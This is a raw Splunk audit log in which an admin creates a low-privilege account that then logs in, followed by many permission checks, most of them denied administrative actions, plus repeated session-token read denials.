Audit:[timestamp=10-06-2022 17:40:52.149, user=user, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:40:52.084, user=user, action=rest_properties_get, info=granted REST: /static/appLogo_2x.png] Audit:[timestamp=10-06-2022 17:40:52.011, user=user, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:40:51.734, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.734, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.598, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.598, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.598, user=user, action=edit_telemetry_settings, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_tokens_own, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_tokens_own, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_sourcetypes, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_health_subset, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_health, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.597, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=restart_splunkd, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=list_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.596, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:40:51.594, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.594, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.594, user=user, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:40:51.592, user=user, action=edit_user, info=denied object="user" operation=edit] Audit:[timestamp=10-06-2022 17:40:51.592, user=user, action=edit_user, info=denied object="user" operation=list] Audit:[timestamp=10-06-2022 17:40:50.774, user=user, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:40:50.567, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.567, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.526, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.526, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.513, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.512, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.301, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.301, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.286, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:50.286, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:49.878, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:40:19.850, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:40:09.125, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:40:09.125, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:40:09.123, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:40:09.116, user=user, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:40:08.781, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.780, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.780, user=user, action=edit_user, info=denied object="user" operation=edit] Audit:[timestamp=10-06-2022 17:40:08.780, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.780, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.780, user=user, action=edit_telemetry_settings, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.780, user=user, action=edit_user, info=denied object="user" operation=list] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_workload_pools, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_tokens_own, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_tokens_own, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_tokens_all, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_sourcetypes, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=license_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_health_subset, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_health, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_global_banner, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_client, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_dist_peer, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=list_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.779, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=list_forwarders, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_splunktcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=indexes_edit, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=restart_splunkd, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=list_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_indexer_cluster, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_deployment_server, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_token_http, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_scripted, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_udp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_tcp, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_monitor, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_upload_and_index, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=change_authentication, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_user, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.778, user=user, action=edit_roles, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.776, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.776, user=user, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.776, user=user, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:40:08.268, user=user, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:40:08.060, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.060, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.024, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.023, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.011, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:08.011, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:07.822, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:07.822, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:07.809, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:07.809, user=user, action=edit_local_apps, info=denied ] Audit:[timestamp=10-06-2022 17:40:07.647, user=user, action=edit_user, info=denied object="user" operation=edit] Audit:[timestamp=10-06-2022 17:40:07.646, user=user, action=edit_user, info=denied object="user" operation=list] Audit:[timestamp=10-06-2022 17:40:07.638, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="admin"] Audit:[timestamp=10-06-2022 17:40:07.349, user=user, action=login attempt, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188" method=Splunk" session=049c5d83adf94432d0ba08e524cbc70d] Audit:[timestamp=10-06-2022 17:39:58.030, user=user, action=login attempt, info=failed, src=10.56.227.188 method=Splunk] Audit:[timestamp=10-06-2022 17:39:49.811, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:39:19.781, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:38:49.742, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:38:19.704, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:38:00.818, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="admin"] Audit:[timestamp=10-06-2022 17:38:00.810, user=n/a, action=read_session_token, info=denied, reason="non-locally generated token", session_user="admin"] Audit:[timestamp=10-06-2022 17:38:00.576, user=admin, action=logout, info=succeeded reason=user-initiated useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" clientip=10.56.227.188 session=f3000feb2231672df44853224bd304c2] Audit:[timestamp=10-06-2022 17:37:54.726, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:54.585, user=admin, action=edit_user, info=granted object="user" operation=list] Audit:[timestamp=10-06-2022 17:37:54.585, user=admin, action=create_user, info=succeeded, username="user", fullname="", email="", create_role=0, roles="user", passwordState="force_change_pass", default_app="launcher"] Audit:[timestamp=10-06-2022 17:37:54.581, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:54.581, user=admin, action=edit_user, info=granted object="user" operation=create] Audit:[timestamp=10-06-2022 17:37:54.581, user=admin, action=edit_roles, info=granted object="user" operation=create] Audit:[timestamp=10-06-2022 17:37:54.440, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:51.285, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:37:49.665, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:37:41.279, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:37:31.275, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:37:31.133, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:37:31.111, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.993, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.993, user=admin, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.993, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.978, user=admin, action=edit_telemetry_settings, info=granted object="general" operation=list] Audit:[timestamp=10-06-2022 17:37:30.796, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.796, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.796, user=admin, action=accelerate_search, info=granted ] 